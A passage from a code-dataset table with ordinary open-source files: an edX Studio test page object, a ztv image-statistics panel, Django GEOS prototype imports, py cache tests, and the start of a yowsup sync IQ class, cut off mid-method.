repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
raeeschachar/edx-e2e-mirror | regression/pages/studio/course_outline_page.py | 1 | 4324 | """
Course Outline Page for Studio
"""
from edxapp_acceptance.pages.studio.overview import CourseOutlinePage
from selenium.webdriver.common.action_chains import ActionChains
from regression.pages.studio.utils import (
click_confirmation_prompt_primary_button
)
from regression.tests.helpers import get_url
class CourseOutlinePageExtended(CourseOutlinePage):
"""
Coure Outline Extended Page for Studio
"""
@property
def url(self):
"""
Construct a URL to the page within the course.
"""
return get_url(self.url_path, self.course_info)
def add_section_with_name(self, text):
"""
Adds Section clicking the (main) New Section button and given name
Arguments:
text (str): The section added will be named to this
"""
self.q(css='.wrapper-mast nav.nav-actions .button-new').click()
section_css = '.wrapper-section-title.wrapper-xblock-field.incontext-editor.is-editable.is-editing' \
' .xblock-field-input.incontext-editor-input'
self.wait_for_element_visibility(section_css, 'Section is visible')
self.q(
css=section_css
).results[0].send_keys(text)
self.q(css='.content').first.click()
# Click initiates an ajax call
self.wait_for_ajax()
def add_subsection_with_name(self, text):
"""
Adds Subsection clicking the subsection button of a section
There should be one Section available
Arguments:
text (str): The sub section added will be named to this
"""
subsection_css = '.wrapper-subsection-title.wrapper-xblock-field.' \
'incontext-editor.is-editable.is-editing' \
' .xblock-field-input.incontext-editor-input'
self.q(
css='.button-new[data-default-name="Subsection"]'
).results[-1].click()
self.wait_for_element_visibility(
subsection_css, 'subsection is visible'
)
self.wait_for_ajax()
self.q(
css=subsection_css
).results[-1].send_keys(text)
self.q(css='.content').first.click()
# Click initiates an ajax call
self.wait_for_ajax()
def click_add_unit_button(self):
"""
Adds Unit clicking the unit button of a sub section
Navigates to Add Components page
"""
self.q(css='.button-new[data-default-name="Unit"]').results[-1].click()
def get_subsection_grade(self):
"""
Returns:
List of grades available in Grade as drop down in subsection settings
"""
return self.q(css='#grading_type option').text
def get_section_count(self):
"""
Returns total number of sections
"""
return len(
self.q(
css='.section-header-actions ul.actions-list '
'li.action-item.action-delete a.delete-button.'
'action-button '
'span.icon.fa.fa-trash-o'
)
)
def cancel_subsection_settings(self):
"""
Clicks cancel button of Subsection Settings pop up
"""
self.q(css='.action-cancel').click()
self.wait_for_ajax()
def delete_section(self):
"""
This deletes a section
"""
self.q(
css='.section-header-actions ul.actions-list '
'li.action-item.action-delete a.delete-button.action-button '
'span.icon.fa.fa-trash-o'
).first.click()
self.wait_for_ajax()
click_confirmation_prompt_primary_button(self)
def click_edit_start_date_button(self):
"""
Clicks edit start date button on Course Outline page
"""
button = self.q(css='.action-button span.icon.fa.fa-pencil').results[0]
# This button is hidden, hovering on it makes it visible
# Using ActionChains to handle this
ActionChains(
self.browser
).move_to_element(button).click(button).perform()
def make_sure_only_one_section_is_present(self):
"""
Makes sure there is only one section present
"""
while self.get_section_count() > 1:
self.delete_section()
| agpl-3.0 |
henryroe/ztv | ztv/stats_panel.py | 1 | 24355 | from __future__ import absolute_import
import wx
from wx.lib.pubsub import pub
from matplotlib.patches import Rectangle
from matplotlib import cm
import numpy as np
from astropy.stats import sigma_clipped_stats
import sys
from .ztv_wx_lib import set_textctrl_background_color, validate_textctrl_str, textctrl_output_only_background_color
from .ztv_lib import send_to_stream
class StatsPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.ztv_frame = self.GetTopLevelParent()
self.ztv_frame.primary_image_panel.popup_menu_cursor_modes.append('Stats box')
self.ztv_frame.primary_image_panel.available_cursor_modes['Stats box'] = {
'set-to-mode':self.set_cursor_to_stats_box_mode,
'on_button_press':self.on_button_press,
'on_motion':self.on_motion,
'on_button_release':self.on_button_release}
self.textentry_font = wx.Font(14, wx.FONTFAMILY_MODERN, wx.NORMAL, wx.FONTWEIGHT_LIGHT, False)
self.stats_info = None
self.last_string_values = {'x0':'', 'xsize':'', 'x1':'', 'y0':'', 'ysize':'', 'y1':''}
self.stats_rect = Rectangle((0, 0), 10, 10, color='magenta', fill=False, zorder=100)
# use self.stats_rect as where we store/retrieve the x0,y0,x1,y1
# x0,y0,x1,y1 should be limited to range of 0 to shape-1
# but, stats should be calculated over e.g. x0:x1+1 (so that have pixels to do stats on even if x0==x1)
# and, width/height of stats_rect should always be >= 0
values_sizer = wx.FlexGridSizer( 10, 5, 0, 0 )
values_sizer.SetFlexibleDirection( wx.BOTH )
values_sizer.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
self.low_static_text = wx.StaticText( self, wx.ID_ANY, u"Low", wx.DefaultPosition, wx.DefaultSize, wx.ALIGN_RIGHT )
self.low_static_text.Wrap( -1 )
values_sizer.Add(self.low_static_text, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 0)
self.low_static_text = wx.StaticText( self, wx.ID_ANY, u"# pix", wx.DefaultPosition, wx.DefaultSize, 0 )
self.low_static_text.Wrap( -1 )
values_sizer.Add(self.low_static_text, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 0)
self.high_static_text = wx.StaticText( self, wx.ID_ANY, u"High", wx.DefaultPosition, wx.DefaultSize, 0 )
self.high_static_text.Wrap( -1 )
values_sizer.Add(self.high_static_text, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 0)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
self.x_static_text = wx.StaticText( self, wx.ID_ANY, u"x", wx.DefaultPosition, wx.DefaultSize, 0 )
self.x_static_text.Wrap( -1 )
values_sizer.Add(self.x_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 0)
self.x0_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_PROCESS_ENTER)
self.x0_textctrl.SetFont(self.textentry_font)
values_sizer.Add(self.x0_textctrl, 0, wx.ALL, 2)
self.x0_textctrl.Bind(wx.EVT_TEXT, self.x0_textctrl_changed)
self.x0_textctrl.Bind(wx.EVT_TEXT_ENTER, self.x0_textctrl_entered)
self.xsize_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_PROCESS_ENTER)
self.xsize_textctrl.SetFont(self.textentry_font)
values_sizer.Add(self.xsize_textctrl, 0, wx.ALL, 2)
self.xsize_textctrl.Bind(wx.EVT_TEXT, self.xsize_textctrl_changed)
self.xsize_textctrl.Bind(wx.EVT_TEXT_ENTER, self.xsize_textctrl_entered)
self.x1_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_PROCESS_ENTER)
self.x1_textctrl.SetFont(self.textentry_font)
values_sizer.Add(self.x1_textctrl, 0, wx.ALL, 2)
self.x1_textctrl.Bind(wx.EVT_TEXT, self.x1_textctrl_changed)
self.x1_textctrl.Bind(wx.EVT_TEXT_ENTER, self.x1_textctrl_entered)
self.npix_static_text = wx.StaticText( self, wx.ID_ANY, u"# pixels", wx.DefaultPosition, wx.DefaultSize, 0 )
self.npix_static_text.Wrap( -1 )
values_sizer.Add(self.npix_static_text, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_BOTTOM, 0)
self.y_static_text = wx.StaticText( self, wx.ID_ANY, u"y", wx.DefaultPosition, wx.DefaultSize, 0 )
self.y_static_text.Wrap( -1 )
values_sizer.Add(self.y_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 0)
self.y0_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_PROCESS_ENTER)
self.y0_textctrl.SetFont(self.textentry_font)
values_sizer.Add(self.y0_textctrl, 0, wx.ALL, 2)
self.y0_textctrl.Bind(wx.EVT_TEXT, self.y0_textctrl_changed)
self.y0_textctrl.Bind(wx.EVT_TEXT_ENTER, self.y0_textctrl_entered)
self.ysize_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_PROCESS_ENTER)
self.ysize_textctrl.SetFont(self.textentry_font)
values_sizer.Add(self.ysize_textctrl, 0, wx.ALL, 2)
self.ysize_textctrl.Bind(wx.EVT_TEXT, self.ysize_textctrl_changed)
self.ysize_textctrl.Bind(wx.EVT_TEXT_ENTER, self.ysize_textctrl_entered)
self.y1_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_PROCESS_ENTER)
self.y1_textctrl.SetFont(self.textentry_font)
values_sizer.Add(self.y1_textctrl, 0, wx.ALL, 2)
self.y1_textctrl.Bind(wx.EVT_TEXT, self.y1_textctrl_changed)
self.y1_textctrl.Bind(wx.EVT_TEXT_ENTER, self.y1_textctrl_entered)
self.npix_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.npix_textctrl.SetFont(self.textentry_font)
self.npix_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.npix_textctrl, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT, 0)
values_sizer.AddSpacer((0,15), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
self.median_static_text = wx.StaticText( self, wx.ID_ANY, u"Median", wx.DefaultPosition, wx.DefaultSize, 0 )
self.median_static_text.Wrap( -1 )
values_sizer.Add(self.median_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
self.median_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.median_textctrl.SetFont(self.textentry_font)
self.median_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.median_textctrl, 0, wx.ALL, 2)
self.robust_static_text = wx.StaticText( self, wx.ID_ANY, u"Robust", wx.DefaultPosition, wx.DefaultSize, 0 )
self.robust_static_text.Wrap( -1 )
values_sizer.Add(self.robust_static_text, 0, wx.ALL|wx.ALIGN_BOTTOM|wx.ALIGN_CENTER_HORIZONTAL, 0)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
self.mean_static_text = wx.StaticText( self, wx.ID_ANY, u"Mean", wx.DefaultPosition, wx.DefaultSize, 0 )
self.mean_static_text.Wrap( -1 )
values_sizer.Add(self.mean_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
self.mean_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.mean_textctrl.SetFont(self.textentry_font)
self.mean_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.mean_textctrl, 0, wx.ALL, 2)
self.robust_mean_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.robust_mean_textctrl.SetFont(self.textentry_font)
self.robust_mean_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.robust_mean_textctrl, 0, wx.ALL, 2)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
self.stdev_static_text = wx.StaticText( self, wx.ID_ANY, u"Stdev", wx.DefaultPosition, wx.DefaultSize, 0 )
self.stdev_static_text.Wrap( -1 )
values_sizer.Add(self.stdev_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
self.stdev_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.stdev_textctrl.SetFont(self.textentry_font)
self.stdev_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.stdev_textctrl, 0, wx.ALL, 2)
self.robust_stdev_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.robust_stdev_textctrl.SetFont(self.textentry_font)
self.robust_stdev_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.robust_stdev_textctrl, 0, wx.ALL, 2)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,15), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
self.min_static_text = wx.StaticText( self, wx.ID_ANY, u"Min", wx.DefaultPosition, wx.DefaultSize, 0 )
self.min_static_text.Wrap( -1 )
values_sizer.Add(self.min_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
self.minval_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.minval_textctrl.SetFont(self.textentry_font)
self.minval_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.minval_textctrl, 0, wx.ALL, 2)
self.minpos_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.minpos_textctrl.SetFont(self.textentry_font)
self.minpos_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.minpos_textctrl, 0, wx.ALL, 2)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
self.max_static_text = wx.StaticText( self, wx.ID_ANY, u"Max", wx.DefaultPosition, wx.DefaultSize, 0 )
self.max_static_text.Wrap( -1 )
values_sizer.Add(self.max_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
self.maxval_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.maxval_textctrl.SetFont(self.textentry_font)
self.maxval_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.maxval_textctrl, 0, wx.ALL, 2)
self.maxpos_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
wx.TE_READONLY)
self.maxpos_textctrl.SetFont(self.textentry_font)
self.maxpos_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
values_sizer.Add(self.maxpos_textctrl, 0, wx.ALL, 2)
self.hideshow_button = wx.Button(self, wx.ID_ANY, u"Show", wx.DefaultPosition, wx.DefaultSize, 0)
values_sizer.Add(self.hideshow_button, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL, 2)
self.hideshow_button.Bind(wx.EVT_BUTTON, self.on_hideshow_button)
v_sizer1 = wx.BoxSizer(wx.VERTICAL)
v_sizer1.AddStretchSpacer(1.0)
v_sizer1.Add(values_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL)
v_sizer1.AddStretchSpacer(1.0)
self.SetSizer(v_sizer1)
pub.subscribe(self.queue_update_stats, 'recalc-display-image-called')
pub.subscribe(self._set_stats_box_parameters, 'set-stats-box-parameters')
pub.subscribe(self.publish_stats_to_stream, 'get-stats-box-info')
def publish_stats_to_stream(self, msg=None):
wx.CallAfter(send_to_stream, sys.stdout, ('stats-box-info', self.stats_info))
def on_button_press(self, event):
self.select_panel()
self.update_stats_box(event.xdata, event.ydata, event.xdata, event.ydata)
self.redraw_overplot_on_image()
self.cursor_stats_box_x0, self.cursor_stats_box_y0 = event.xdata, event.ydata
def on_motion(self, event):
if event.button is not None:
self.update_stats_box(self.cursor_stats_box_x0, self.cursor_stats_box_y0, event.xdata, event.ydata)
self.redraw_overplot_on_image()
self.update_stats()
def on_button_release(self, event):
self.redraw_overplot_on_image()
self.update_stats()
def set_cursor_to_stats_box_mode(self, event):
self.ztv_frame.primary_image_panel.cursor_mode = 'Stats box'
self.ztv_frame.stats_panel.select_panel()
self.ztv_frame.stats_panel.highlight_panel()
def queue_update_stats(self, msg=None):
"""
wrapper to call update_stats from CallAfter in order to make GUI as responsive as possible.
"""
wx.CallAfter(self.update_stats, msg=None)
def _set_stats_box_parameters(self, msg):
"""
wrapper to update_stats_box to receive messages & translate them correctly
"""
x0,x1,y0,y1 = [None]*4
if msg['xrange'] is not None:
x0,x1 = msg['xrange']
if msg['yrange'] is not None:
y0,y1 = msg['yrange']
if msg['xrange'] is not None or msg['yrange'] is not None:
self.update_stats_box(x0, y0, x1, y1)
if msg['show_overplot'] is not None:
if msg['show_overplot']:
self.redraw_overplot_on_image()
else:
self.remove_overplot_on_image()
send_to_stream(sys.stdout, ('set-stats-box-parameters-done', True))
def update_stats_box(self, x0=None, y0=None, x1=None, y1=None):
if x0 is None:
x0 = self.stats_rect.get_x()
if y0 is None:
y0 = self.stats_rect.get_y()
if x1 is None:
x1 = self.stats_rect.get_x() + self.stats_rect.get_width()
if y1 is None:
y1 = self.stats_rect.get_y() + self.stats_rect.get_height()
if x0 > x1:
x0, x1 = x1, x0
if y0 > y1:
y0, y1 = y1, y0
x0 = min(max(0, x0), self.ztv_frame.display_image.shape[1] - 1)
y0 = min(max(0, y0), self.ztv_frame.display_image.shape[0] - 1)
x1 = min(max(0, x1), self.ztv_frame.display_image.shape[1] - 1)
y1 = min(max(0, y1), self.ztv_frame.display_image.shape[0] - 1)
self.stats_rect.set_bounds(x0, y0, x1 - x0, y1 - y0)
if self.hideshow_button.GetLabel() == 'Hide':
self.ztv_frame.primary_image_panel.figure.canvas.draw()
self.update_stats()
def remove_overplot_on_image(self):
self.ztv_frame.primary_image_panel.remove_patch('stats_panel:stats_rect')
self.hideshow_button.SetLabel(u"Show")
def redraw_overplot_on_image(self):
self.ztv_frame.primary_image_panel.add_patch('stats_panel:stats_rect', self.stats_rect)
self.hideshow_button.SetLabel(u"Hide")
def on_hideshow_button(self, evt):
if self.hideshow_button.GetLabel() == 'Hide':
self.remove_overplot_on_image()
else:
self.redraw_overplot_on_image()
def get_x0y0x1y1_from_stats_rect(self):
x0 = self.stats_rect.get_x()
y0 = self.stats_rect.get_y()
x1 = x0 + self.stats_rect.get_width()
y1 = y0 + self.stats_rect.get_height()
return x0,y0,x1,y1
def update_stats(self, msg=None):
x0,y0,x1,y1 = self.get_x0y0x1y1_from_stats_rect()
x0, y0 = int(np.round(x0)), int(np.round(y0))
x1, y1 = int(np.round(x1)), int(np.round(y1))
self.last_string_values['x0'] = str(int(x0))
self.x0_textctrl.SetValue(self.last_string_values['x0'])
self.last_string_values['y0'] = str(int(y0))
self.y0_textctrl.SetValue(self.last_string_values['y0'])
x_npix = int(x1 - x0 + 1)
self.last_string_values['xsize'] = str(x_npix)
self.xsize_textctrl.SetValue(self.last_string_values['xsize'])
y_npix = int(y1 - y0 + 1)
self.last_string_values['ysize'] = str(y_npix)
self.ysize_textctrl.SetValue(self.last_string_values['ysize'])
self.last_string_values['x1'] = str(int(x1))
self.x1_textctrl.SetValue(self.last_string_values['x1'])
self.last_string_values['y1'] = str(int(y1))
self.y1_textctrl.SetValue(self.last_string_values['y1'])
self.npix_textctrl.SetValue(str(x_npix * y_npix))
stats_data = self.ztv_frame.display_image[y0:y1+1, x0:x1+1]
finite_mask = np.isfinite(stats_data)
if finite_mask.max() is np.True_:
stats_data_mean = stats_data[finite_mask].mean()
stats_data_median = np.median(stats_data[finite_mask])
stats_data_std = stats_data[finite_mask].std()
robust_mean, robust_median, robust_std = sigma_clipped_stats(stats_data[finite_mask])
else:
stats_data_mean = np.nan
stats_data_median = np.nan
stats_data_std = np.inf
robust_mean, robust_median, robust_std = np.nan, np.nan, np.inf
self.stats_info = {'xrange':[x0,x1], 'yrange':[y0,y1],
'mean':stats_data_mean, 'median':stats_data_median, 'std':stats_data_std,
'min':stats_data.min(), 'max':stats_data.max()} # want min/max to reflect any Inf/NaN
self.mean_textctrl.SetValue("{:0.4g}".format(self.stats_info['mean']))
self.median_textctrl.SetValue("{:0.4g}".format(self.stats_info['median']))
self.stdev_textctrl.SetValue("{:0.4g}".format(self.stats_info['std']))
self.stats_info['robust-mean'] = robust_mean
self.stats_info['robust-median'] = robust_median
self.stats_info['robust-std'] = robust_std
self.robust_mean_textctrl.SetValue("{:0.4g}".format(robust_mean))
self.robust_stdev_textctrl.SetValue("{:0.4g}".format(robust_std))
self.minval_textctrl.SetValue("{:0.4g}".format(self.stats_info['min']))
self.maxval_textctrl.SetValue("{:0.4g}".format(self.stats_info['max']))
wmin = np.where(stats_data == stats_data.min())
wmin = [(wmin[1][i] + x0,wmin[0][i] + y0) for i in np.arange(wmin[0].size)]
if len(wmin) == 1:
wmin = wmin[0]
self.minpos_textctrl.SetValue("{}".format(wmin))
self.stats_info['wmin'] = wmin
wmax = np.where(stats_data == stats_data.max())
wmax = [(wmax[1][i] + x0,wmax[0][i] + y0) for i in np.arange(wmax[0].size)]
if len(wmax) == 1:
wmax = wmax[0]
self.maxpos_textctrl.SetValue("{}".format(wmax))
self.stats_info['wmax'] = wmax
set_textctrl_background_color(self.x0_textctrl, 'ok')
set_textctrl_background_color(self.x1_textctrl, 'ok')
set_textctrl_background_color(self.xsize_textctrl, 'ok')
set_textctrl_background_color(self.y0_textctrl, 'ok')
set_textctrl_background_color(self.y1_textctrl, 'ok')
set_textctrl_background_color(self.ysize_textctrl, 'ok')
def x0_textctrl_changed(self, evt):
validate_textctrl_str(self.x0_textctrl, int, self.last_string_values['x0'])
def x0_textctrl_entered(self, evt):
if validate_textctrl_str(self.x0_textctrl, int, self.last_string_values['x0']):
self.last_string_values['x0'] = self.x0_textctrl.GetValue()
self.update_stats_box(int(self.last_string_values['x0']), None, None, None)
self.x0_textctrl.SetSelection(-1, -1)
self.redraw_overplot_on_image()
def xsize_textctrl_changed(self, evt):
validate_textctrl_str(self.xsize_textctrl, int, self.last_string_values['xsize'])
def xsize_textctrl_entered(self, evt):
if validate_textctrl_str(self.xsize_textctrl, int, self.last_string_values['xsize']):
self.last_string_values['xsize'] = self.xsize_textctrl.GetValue()
xsize = int(self.last_string_values['xsize'])
sys.stderr.write("\n\nxsize = {}\n\n".format(xsize))
x0,y0,x1,y1 = self.get_x0y0x1y1_from_stats_rect()
xc = (x0 + x1) / 2.
x0 = max(0, int(xc - xsize / 2.))
x1 = x0 + xsize - 1
x1 = min(x1, self.ztv_frame.display_image.shape[1] - 1)
x0 = x1 - xsize + 1
x0 = max(0, int(xc - xsize / 2.))
self.update_stats_box(x0, y0, x1, y1)
self.xsize_textctrl.SetSelection(-1, -1)
self.redraw_overplot_on_image()
def x1_textctrl_changed(self, evt):
validate_textctrl_str(self.x1_textctrl, int, self.last_string_values['x1'])
def x1_textctrl_entered(self, evt):
if validate_textctrl_str(self.x1_textctrl, int, self.last_string_values['x1']):
self.last_string_values['x1'] = self.x1_textctrl.GetValue()
self.update_stats_box(None, None, int(self.last_string_values['x1']), None)
self.x1_textctrl.SetSelection(-1, -1)
self.redraw_overplot_on_image()
def y0_textctrl_changed(self, evt):
validate_textctrl_str(self.y0_textctrl, int, self.last_string_values['y0'])
def y0_textctrl_entered(self, evt):
if validate_textctrl_str(self.y0_textctrl, int, self.last_string_values['y0']):
self.last_string_values['y0'] = self.y0_textctrl.GetValue()
self.update_stats_box(None, int(self.last_string_values['y0']), None, None)
self.y0_textctrl.SetSelection(-1, -1)
self.redraw_overplot_on_image()
def ysize_textctrl_changed(self, evt):
validate_textctrl_str(self.ysize_textctrl, int, self.last_string_values['ysize'])
def ysize_textctrl_entered(self, evt):
if validate_textctrl_str(self.ysize_textctrl, int, self.last_string_values['ysize']):
self.last_string_values['ysize'] = self.ysize_textctrl.GetValue()
ysize = int(self.last_string_values['ysize'])
x0,y0,x1,y1 = self.get_x0y0x1y1_from_stats_rect()
yc = (y0 + y1) / 2.
y0 = max(0, int(yc - ysize / 2.))
y1 = y0 + ysize - 1
y1 = min(y1, self.ztv_frame.display_image.shape[0] - 1)
y0 = y1 - ysize + 1
y0 = max(0, int(yc - ysize / 2.))
self.update_stats_box(x0, y0, x1, y1)
self.ysize_textctrl.SetSelection(-1, -1)
self.redraw_overplot_on_image()
def y1_textctrl_changed(self, evt):
validate_textctrl_str(self.y1_textctrl, int, self.last_string_values['y1'])
def y1_textctrl_entered(self, evt):
if validate_textctrl_str(self.y1_textctrl, int, self.last_string_values['y1']):
self.last_string_values['y1'] = self.y1_textctrl.GetValue()
self.update_stats_box(None, None, None, int(self.last_string_values['y1']))
self.y1_textctrl.SetSelection(-1, -1)
self.redraw_overplot_on_image()
| mit |
shacker/django | django/contrib/gis/geos/prototypes/__init__.py | 67 | 1221 | """
This module contains all of the GEOS ctypes function prototypes. Each
prototype handles the interaction between the GEOS library and Python
via ctypes.
"""
from django.contrib.gis.geos.prototypes.coordseq import ( # NOQA
create_cs, cs_clone, cs_getdims, cs_getordinate, cs_getsize, cs_getx,
cs_gety, cs_getz, cs_setordinate, cs_setx, cs_sety, cs_setz, get_cs,
)
from django.contrib.gis.geos.prototypes.geom import ( # NOQA
create_collection, create_empty_polygon, create_linearring,
create_linestring, create_point, create_polygon, destroy_geom, geom_clone,
geos_get_srid, geos_normalize, geos_set_srid, geos_type, geos_typeid,
get_dims, get_extring, get_geomn, get_intring, get_nrings, get_num_coords,
get_num_geoms,
)
from django.contrib.gis.geos.prototypes.misc import * # NOQA
from django.contrib.gis.geos.prototypes.predicates import ( # NOQA
geos_contains, geos_covers, geos_crosses, geos_disjoint, geos_equals,
geos_equalsexact, geos_hasz, geos_intersects, geos_isclosed, geos_isempty,
geos_isring, geos_issimple, geos_isvalid, geos_overlaps,
geos_relatepattern, geos_touches, geos_within,
)
from django.contrib.gis.geos.prototypes.topology import * # NOQA
| bsd-3-clause |
tictakk/servo | tests/wpt/web-platform-tests/tools/py/testing/path/test_cacheutil.py | 163 | 2949 | import py
from py._path import cacheutil
class BasicCacheAPITest:
cache = None
def test_getorbuild(self):
val = self.cache.getorbuild(-42, lambda: 42)
assert val == 42
val = self.cache.getorbuild(-42, lambda: 23)
assert val == 42
def test_cache_get_key_error(self):
py.test.raises(KeyError, "self.cache._getentry(-23)")
def test_delentry_non_raising(self):
val = self.cache.getorbuild(100, lambda: 100)
self.cache.delentry(100)
py.test.raises(KeyError, "self.cache._getentry(100)")
def test_delentry_raising(self):
val = self.cache.getorbuild(100, lambda: 100)
self.cache.delentry(100)
py.test.raises(KeyError, "self.cache.delentry(100, raising=True)")
def test_clear(self):
self.cache.clear()
class TestBuildcostAccess(BasicCacheAPITest):
cache = cacheutil.BuildcostAccessCache(maxentries=128)
def test_cache_works_somewhat_simple(self, monkeypatch):
cache = cacheutil.BuildcostAccessCache()
# the default gettime
# BuildcostAccessCache.build can
# result into time()-time() == 0 which makes the below
# test fail randomly. Let's rather use incrementing
# numbers instead.
l = [0]
def counter():
l[0] = l[0] + 1
return l[0]
monkeypatch.setattr(cacheutil, 'gettime', counter)
for x in range(cache.maxentries):
y = cache.getorbuild(x, lambda: x)
assert x == y
for x in range(cache.maxentries):
assert cache.getorbuild(x, None) == x
halfentries = int(cache.maxentries / 2)
for x in range(halfentries):
assert cache.getorbuild(x, None) == x
assert cache.getorbuild(x, None) == x
# evict one entry
val = cache.getorbuild(-1, lambda: 42)
assert val == 42
# check that recently used ones are still there
# and are not build again
for x in range(halfentries):
assert cache.getorbuild(x, None) == x
assert cache.getorbuild(-1, None) == 42
class TestAging(BasicCacheAPITest):
maxsecs = 0.10
cache = cacheutil.AgingCache(maxentries=128, maxseconds=maxsecs)
def test_cache_eviction(self):
self.cache.getorbuild(17, lambda: 17)
endtime = py.std.time.time() + self.maxsecs * 10
while py.std.time.time() < endtime:
try:
self.cache._getentry(17)
except KeyError:
break
py.std.time.sleep(self.maxsecs*0.3)
else:
py.test.fail("waiting for cache eviction failed")
def test_prune_lowestweight():
maxsecs = 0.05
cache = cacheutil.AgingCache(maxentries=10, maxseconds=maxsecs)
for x in range(cache.maxentries):
cache.getorbuild(x, lambda: x)
py.std.time.sleep(maxsecs*1.1)
cache.getorbuild(cache.maxentries+1, lambda: 42)
| mpl-2.0 |
kenju254/yowsup | yowsup/layers/protocol_contacts/protocolentities/iq_sync.py | 29 | 1903 | from yowsup.structs import ProtocolTreeNode
from yowsup.layers.protocol_iq.protocolentities import IqProtocolEntity
import time
class SyncIqProtocolEntity(IqProtocolEntity):
'''
<iq type="get" id="{{id}}" xmlns="urn:xmpp:whatsapp:sync">
<sync
sid="{{str((int(time.time()) + 11644477200) * 10000000)}}"
index="{{0 | ?}}"
last="{{true | false?}}"
>
</sync>
</iq>
'''
def __init__(self, _type, _id = None, sid = None, index = 0, last = True):
super(SyncIqProtocolEntity, self).__init__("urn:xmpp:whatsapp:sync", _id = _id, _type = _type)
self.setSyncProps(sid, index, last)
def setSyncProps(self, sid, index, last):
